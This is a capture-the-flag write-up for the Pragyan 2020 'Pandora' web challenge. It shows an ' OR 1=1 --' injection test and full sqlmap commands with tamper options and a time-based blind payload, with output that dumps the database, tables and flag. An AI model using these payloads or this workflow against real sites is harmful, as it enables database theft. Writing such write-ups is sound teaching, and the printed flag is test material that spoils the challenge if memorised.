Pragyan 2020 - Pandora
Posted on mer. 26 février 2020 in CTF
Solved by: 7%
First solvers: nguyendqn
Jake in pandora needs to save Naʼvi from Human invasion. But he is not sure human`s army base`s locations.
Help him find those location so that he can take them down before they start their move.
link: http://ctf.pragyan.org:14000
We need to create an account with a username and password (admin123
here). When you get in, the webpage shows you that you don't have any message.
A quick test with the NAME
param with ' OR 1=1 --'
show all the message. Great! We found a SQL injection. Let's try to get all data with sqlmap
.
Valid the injection
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"
[...]
[11:49:19] [INFO] GET parameter 'NAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[...]
GET parameter 'NAME' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=admin123' AND (SELECT 5886 FROM (SELECT(SLEEP(5)))YUbz) AND 'iTBY'='iTBY
---
Dump database
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" --dbs
[...]
[11:51:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:51:16] [INFO] retrieved: 2
[11:51:21] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[11:53:55] [INFO] retrieved: capture_the_flag
available databases [2]:
[*] capture_the_flag
[*] information_schema
[...]
Dump tables
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag --tables
[...]
[11:58:26] [INFO] retrieved: pandoralocations
[12:00:44] [INFO] retrieved: pandoramsg
[12:01:25] [INFO] retrieved: pandorausers
Database: capture_the_flag
[3 tables]
+------------------+
| pandoralocations |
| pandoramsg |
| pandorausers |
+------------------+
Dump data
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag -T pandoralocations --dump
[...]
Database: capture_the_flag
Table: pandoralocations
[3 entries]
+-------+----------------------------------------+-----------+
| base | latitude | longitude |
+-------+----------------------------------------+-----------+
| base1 | 10.0054 N | 45.0245E |
| base2 | p_ctf{4vengers_455emb1e_0ne_l45t_t1me} | 56.0245e |
| base3 | 45.9999 S | 66.04578W |
+-------+----------------------------------------+-----------+
YEAH! We got finally the flag : p_ctf{4vengers_455emb1e_0ne_l45t_t1me}
.